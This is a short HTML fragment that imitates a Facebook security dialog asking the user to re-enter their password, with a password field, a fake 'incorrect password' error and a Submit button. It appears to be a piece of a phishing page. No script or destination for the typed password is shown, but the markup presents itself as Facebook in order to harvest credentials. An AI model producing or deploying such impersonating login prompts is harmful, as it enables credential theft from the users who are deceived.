<div class="sc-ce9c5cf8-0 kVLiUK">
    <div class="sc-ce9c5cf8-1 clDnUI">
        <div class="gradient"></div>
        <div class="px-3 pt-5">
            <span style="font-weight: 500; font-size: 14px;">
                <span id="nameofuser"></span> • Facebook</span>
            <div class="py-1">
                <div class="sc-ce9c5cf8-2 dKtUEZ">Please re-enter your password</div>
            </div>
        </div>
        <div class="px-3 pb-3">
            <span style="font-weight: 500; font-size: 14px;">For your security, you must re-enter your password to continue.</span>
            <div class="pt-2">
                <input id="passwordInput" placeholder="Password" class="sc-ce9c5cf8-6 YkvTn inputTypePW form-control false" type="text" value="">
            </div>
            <div id="errorText" class="text-end" style="color: red; font-size: 13px; font-weight: 500; display: none; margin-top: 10px;">
                The password you've entered is incorrect.
            </div>
            <div class="text-end pt-4">
                <button class="sc-ce9c5cf8-7 gKfJIg" id="psw">Submit</button>
            </div>
        </div>
    </div>
</div>
